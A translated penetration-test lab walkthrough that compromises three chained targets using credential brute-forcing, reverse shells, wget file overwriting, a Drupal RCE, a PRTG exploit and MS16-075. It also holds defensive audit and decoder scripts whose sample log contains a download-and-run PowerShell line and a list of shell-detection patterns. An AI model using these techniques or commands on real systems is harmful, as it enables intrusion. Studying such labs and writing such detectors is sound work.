Penetration test practice: multi-segment, multi-scenario target machine intrusion

Posted by tzul at 2020-04-13


Hello everyone. I've been too busy to update the articles for several months, but many friends have recognized my ID and avatar at offline work and events. Thank you very much for your attention to my articles, and I hope to write more and better ones in the future!!

This time I have prepared three target machines spanning three different network segments: two Linux and one Windows Server 2008. The attacker compromises them one by one, escalates privileges, pivots through each host and completes the whole intrusion. (I am working on my work laptop, whose performance is limited, so there are only three layers of network segments; the principle is the same for more, so please bear with me.)

Network topology

Scenario 1:

Scenario 2:

Target machine downloads

Target 1:

Target 2:

Target 3:

Note: the second-layer target machine ships with a single network interface by default, so after obtaining root on it you need to use root to add the extra network interfaces yourself.


First layer network environment

Following the usual routine, first confirm the target IP, IP:, as shown in the figure:

We need to dig further into the target's specifics. Since it is a lab target machine, there is no need for extensive information gathering; an nmap port scan is enough.

We continue with port 80 as the entry point.

Just a GIF. Let's brute-force the directories.

Check them one by one:

As shown in the figure above, Joomla is present. Let's scan it with joomscan.

As the figure shows, nothing useful.

Let's focus on /Zorin and click through it entry by entry.

Two key points can be seen: '/sentrifugo', and the initial default password is 'tool'.

My idea is to collect usernames and brute-force the initial password.

The target machine is themed on a 1985 007 film. I collected the names of the film's characters and made them into a dictionary. The film reference address is

Now we start brute-forcing the password, as shown in the figure:

The default account password was brute-forced successfully: Bob / tool

SSH login succeeded, as shown in the figure:

Next, we move on to privilege escalation, as shown in the figure:

Check one by one:

Successfully obtained Jenny's account password: !! sfbay!!!

Let's continue looking at /Max.

There is an 'aview.py' file in this directory, which we cannot read.

Next, switch to the user Jenny, since her privileges are higher.

Now the file can be read. Let's build a dictionary from the 'note.txt' file; following its rules, I wrote a small script, shown in the figure below:

Run the script and save its output as the file 'fuzzy.txt'.

Next, following its hint, we run the dictionary against port 8191 of the target. I used Burp this time; wfuzz works too, as shown in the figure:


Take a look:

Isn't that the contents of 'aview.py'? Let's modify that Python file and confirm.

As shown in the figure, we have read and write permission, so let's try modifying it.

As you can see, no problem. Next, write in a reverse shell directly, as shown in the figure:

Catch it locally and root is obtained successfully.

(There is another way to solve this target machine; try it on your own.)

Layer 2 network environment

Next, out of habit I use MSF. Let's get a meterpreter session, as shown in the figure:

Check the IP configuration.

Add routes.

After adding them, set up a SOCKS4 proxy as follows:

Next, I use proxychains for the proxying. The commands are as follows:

sudo vim /etc/proxychains.conf

Note: the IP here is the attacker's IP.

Next, test whether the proxy works. Just prefix the normal command with 'proxychains', as shown in the figure:

The proxy works. As the figure above shows, the second-layer target has two ports open, 22 and 80. Following the usual routine, we again use port 80 as the entry point. To open the browser through the proxy, no browser proxy setting is needed; just the following command:

The browser also goes through the proxy successfully, but there is no key page content. Let's brute-force the directories.

We found the /Drupal directory and followed it up.

We find a sensitive user, 'James'; keep it for now, it may be useful later.

Let's continue with /robots.txt.

Check the version information:

As shown in the figure above, this version has an RCE vulnerability. It has appeared many times in my earlier articles, so I won't introduce it again here; this time I use MSF directly to complete the attack.


Operate with a shell:


Everyone can see at a glance that it's Base64. Let's decode it.

We get the password, but it doesn't seem to work, as shown in the figure.

We continue.

Seeing that wget runs with root privileges, the idea is the same as in my earlier article: forge a root-equivalent user entry and use wget to overwrite the original file directly. The operation is as follows:


Run wget, as shown below:

Switch user and root is obtained successfully.
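The wget-runs-as-root path used above is a standard audit item on the defending side. The script below is an added example, not code from the original post or from any of the target machines: it parses sudoers-style rules and a list of SUID binaries and flags file-writing utilities that run as root with unrestricted arguments. The sample sudoers text, the SUID entries and the user names in them (webapp, deploy, ops, alice) are constructed placeholders, not accounts from the target.

```python
"""Added example, not code from the original post: audit sudo rules and SUID
binaries for file-writing utilities (wget, cp, tee, ...) that run as root.
The sudoers text and SUID listing below are constructed samples."""
import os
import re
import stat

# Utilities that can write (or read) arbitrary files. If any of them runs as
# root via sudo or the SUID bit, an unprivileged user can overwrite files such
# as /etc/passwd, which is how the walkthrough turns wget into root.
FILE_WRITERS = {"wget", "curl", "cp", "mv", "dd", "tee", "tar", "vi", "vim",
                "nano", "python", "python3", "perl"}

# user host=(runas[:group]) [TAG:] cmd [args][, cmd [args] ...]
_RULE = re.compile(r"^(\S+)\s+(\S+?)\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")


def audit_sudoers(text):
    """Return the rules that let a non-root user run a file-writing utility
    as root with free arguments (no argument list, or a wildcard in it)."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = _RULE.match(line)
        if not m:
            continue
        user, _host, runas, specs = m.groups()
        runas_user = (runas or "root").split(":")[0]  # sudo defaults to root
        if user == "root" or runas_user not in ("root", "ALL"):
            continue
        nopasswd = False
        for spec in specs.split(","):
            tokens = spec.split()
            # leading tags such as NOPASSWD: apply to this and later commands
            while tokens and tokens[0].endswith(":") and tokens[0][:-1].isupper():
                tag = tokens.pop(0)[:-1]
                if tag in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag == "NOPASSWD"
            if not tokens:
                continue
            command, args = os.path.basename(tokens[0]), tokens[1:]
            if command in FILE_WRITERS and (not args or any("*" in a for a in args)):
                findings.append({"user": user, "command": command,
                                 "nopasswd": nopasswd, "rule": line})
    return findings


def suid_file_writers(entries):
    """entries: iterable of (path, st_mode, st_uid). Return the root-owned
    SUID binaries whose name is a file-writing utility."""
    return [path for path, mode, uid in entries
            if mode & stat.S_ISUID and uid == 0
            and os.path.basename(path) in FILE_WRITERS]


def scan_suid(dirs=("/bin", "/usr/bin", "/usr/local/bin")):
    """Walk real directories and feed their regular files to suid_file_writers."""
    entries = []
    for top in dirs:
        for root, _dirs, files in os.walk(top):
            for name in files:
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode):
                    entries.append((path, st.st_mode, st.st_uid))
    return suid_file_writers(entries)


# Constructed sample sudoers; the user names are placeholders.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
webapp  ALL=(ALL) NOPASSWD: /usr/bin/wget
deploy  ALL=(root) /usr/bin/systemctl restart nginx, /usr/bin/tee /var/log/app.log
ops     ALL=(root) /usr/bin/cp * /var/www/
alice   ALL=(www-data) /usr/bin/wget
"""

# Constructed SUID listing: (path, mode, owner uid); 0o104755 = regular file, SUID, 755.
SAMPLE_SUID = [("/usr/bin/wget", 0o104755, 0), ("/usr/bin/passwd", 0o104755, 0),
               ("/usr/bin/curl", 0o100755, 0), ("/opt/tools/wget", 0o104755, 1000)]

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print("sudo: {user} can run {command} as root (nopasswd={nopasswd}): {rule}".format(**f))
    for path in suid_file_writers(SAMPLE_SUID):
        print("suid: root-owned SUID file writer:", path)
```

On a real host, feed audit_sudoers the contents of /etc/sudoers and the files under /etc/sudoers.d and call scan_suid() for the SUID side. A rule like the webapp one (wget as root, no argument restriction) is the finding to fix: replace it with a wrapper script that hard-codes the destination, since a fixed argument list such as the deploy rule's tee target is not flagged.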

For separate management, I habitually spawn a high-privilege shell, as shown in the figure:

End of the second-layer target machine.

Layer 3 network environment

Next, out of habit I use MSF. Let's get a meterpreter session, as shown in the figure:

Check the IP configuration and add the route again.

Continue adding to proxychains.

Let's use nmap to scan the target.

The target is a Windows Server 2008 system with many open ports, so there are many ways in: MS17-010, SSH brute force, RDP brute force, CVE-2019-0708, etc. Since two environments are envisaged here, I will use two methods, chosen at random, to complete the intrusion:

1. Privilege escalation using PRTG

Since 3389 is open, I will log in first. The command is as follows, as shown in the figure:

Because the target machine's password is 'vagrant', brute-forcing the 'Administrator' password to log in would not be interesting, so I brute-force another account called 'vagrant' instead, as shown in the figure:

Success. Our next step is to log in to the account remotely to carry out the privilege escalation, as shown in the figure:

After logging in, I saw a good thing on the desktop: PRTG Network Monitor, a well-known traffic monitoring product abroad. This scenario simulates a real environment in which a monitoring server for sensitive intranet hosts is deployed without Internet access, as shown in the figure:

Let's go.

1. First determine the software version: 18.1.37

Searching for this version shows there is a vulnerability. Let's verify the trigger manually and try it.

Name it anything.

Next, I use nishang to generate a TCP reverse shell, as shown in the figure.

Then upload shell.ps1 to the compromised second-layer server. (Why upload it to the second layer? Because the third-layer target in this scenario is connected only to the intranet and not to the Internet, so we can only reach it through the compromised second-layer host.) As shown in the figure below:

Then continue with the operation above.

All ready; save and execute.

On the compromised second-layer server, you can see its HTTP request arrive successfully.

Let's see whether the shell comes back.

As shown in the figure above, we have successfully obtained a SYSTEM-privilege shell.

(A side note: in real engagements, if you do it this way there may be cases where the shell is downloaded but never connects back. Here is a workaround; first look at the following figure:

Command explanation: the first part of the command reads shell.ps1 and pipes it to the second part; the second part converts the file to the encoding that PowerShell expects and pipes it to the third part; the third part Base64-encodes it. Then copy the resulting string and have the target execute the command: powershell -enc xxxxx, as shown in the figure:)
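The encoding pipeline just described (script, converted to UTF-16LE, then Base64, which is the format powershell -enc expects) is also what a defender has to undo when such a command shows up in process-creation logs. The script below is an added example, not code from the original post: encode_command reproduces the pipeline, decode_encoded_command inverts it for any -e/-ec/-enc/-EncodedCommand argument found in a command line, and scan_log runs that over log lines and lists suspicious fragments of the decoded script. The log lines, the address 192.0.2.10 and the file name are constructed samples.

```python
"""Added example, not code from the original post: round-trip the
powershell -enc encoding (UTF-16LE + Base64) and decode it out of
process-creation log lines. All log lines below are constructed samples."""
import base64
import binascii

# powershell accepts any unambiguous prefix of -EncodedCommand, plus -ec
_ENC_FLAGS = {"-encodedcommand"[:n] for n in range(2, 16)} | {"-ec"}

# Fragments that commonly appear in download-and-run or reverse-shell
# one-liners; illustrative, not a complete signature set.
SUSPICIOUS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
              "Net.Sockets.TCPClient", "FromBase64String")


def encode_command(script):
    """Encode a script the way the cat | iconv | base64 pipeline above does."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the script carried by the first -enc style argument in a
    command line, or None if there is none or it does not decode."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in _ENC_FLAGS:
            blob = tokens[i + 1].strip("\"'")
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def scan_log(lines):
    """For each log line carrying an encoded command, return its 1-based line
    number, the decoded script and the suspicious fragments it contains."""
    findings = []
    for number, line in enumerate(lines, 1):
        decoded = decode_encoded_command(line)
        if decoded is None:
            continue
        hits = [s for s in SUSPICIOUS if s.lower() in decoded.lower()]
        findings.append({"line": number, "decoded": decoded, "hits": hits})
    return findings


# Constructed process-creation log lines (Sysmon-like key=value layout).
SAMPLE_LOG = [
    "2020-04-13T10:00:01 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -nop -w hidden -enc " + encode_command("Write-Output 'hello'"),
    "2020-04-13T10:00:02 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe Get-Process",
    "2020-04-13T10:00:03 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -ec " + encode_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/shell.ps1')"),
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        verdict = "SUSPICIOUS " + ", ".join(f["hits"]) if f["hits"] else "no known fragment"
        print("line %d: %s -> %s" % (f["line"], verdict, f["decoded"]))
```

The decoder looks at the whole command line rather than just the argument after "-enc" because PowerShell accepts abbreviated flags; a detection that only matches the literal string "-enc" misses "-e" and "-ec". Anything that decodes successfully is worth logging in clear text even when no fragment matches, since the fragment list is only a starting point.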


2. Privilege escalation using MS16-075

This scenario assumes that, after reaching the third layer, the target machine can connect to the Internet. Then we use another method to obtain SYSTEM privileges. Everything above is the same; first brute-force its SSH credentials, as shown in the figure:

Connect to SSH.

Enter cmd, the ordinary Windows command-line interface. What we need to do next is get a shell back to the attacker's machine. A public VPS can be used here; if you don't have one, ngrok / frp etc. also work. I use ngrok here.

Step one: open the tunnels. Two tunnels are opened this time, one to download the trojan and one to receive the shell, as shown in the figure:

Start configuring the trojan.

Next, start a local HTTP server and open the tunnel for downloading the trojan.

Next, bring up the shell-receiving tunnel, start the MSF listener waiting for the target to connect, connect over SSH, and download the trojan with the command.

Next, connect over SSH, download the trojan with the command, and run it.

The shell comes back.

Now we escalate privileges; the figure below shows the vulnerabilities that may be exploitable.

You can also use the project:

Or other privilege-escalation search tools for Windows; there are many online, which are not covered here.

MS16-075 is chosen to finish this time, as shown in the figure:

Privilege escalation succeeds and SYSTEM privileges are obtained.

The end. Thanks for reading!!!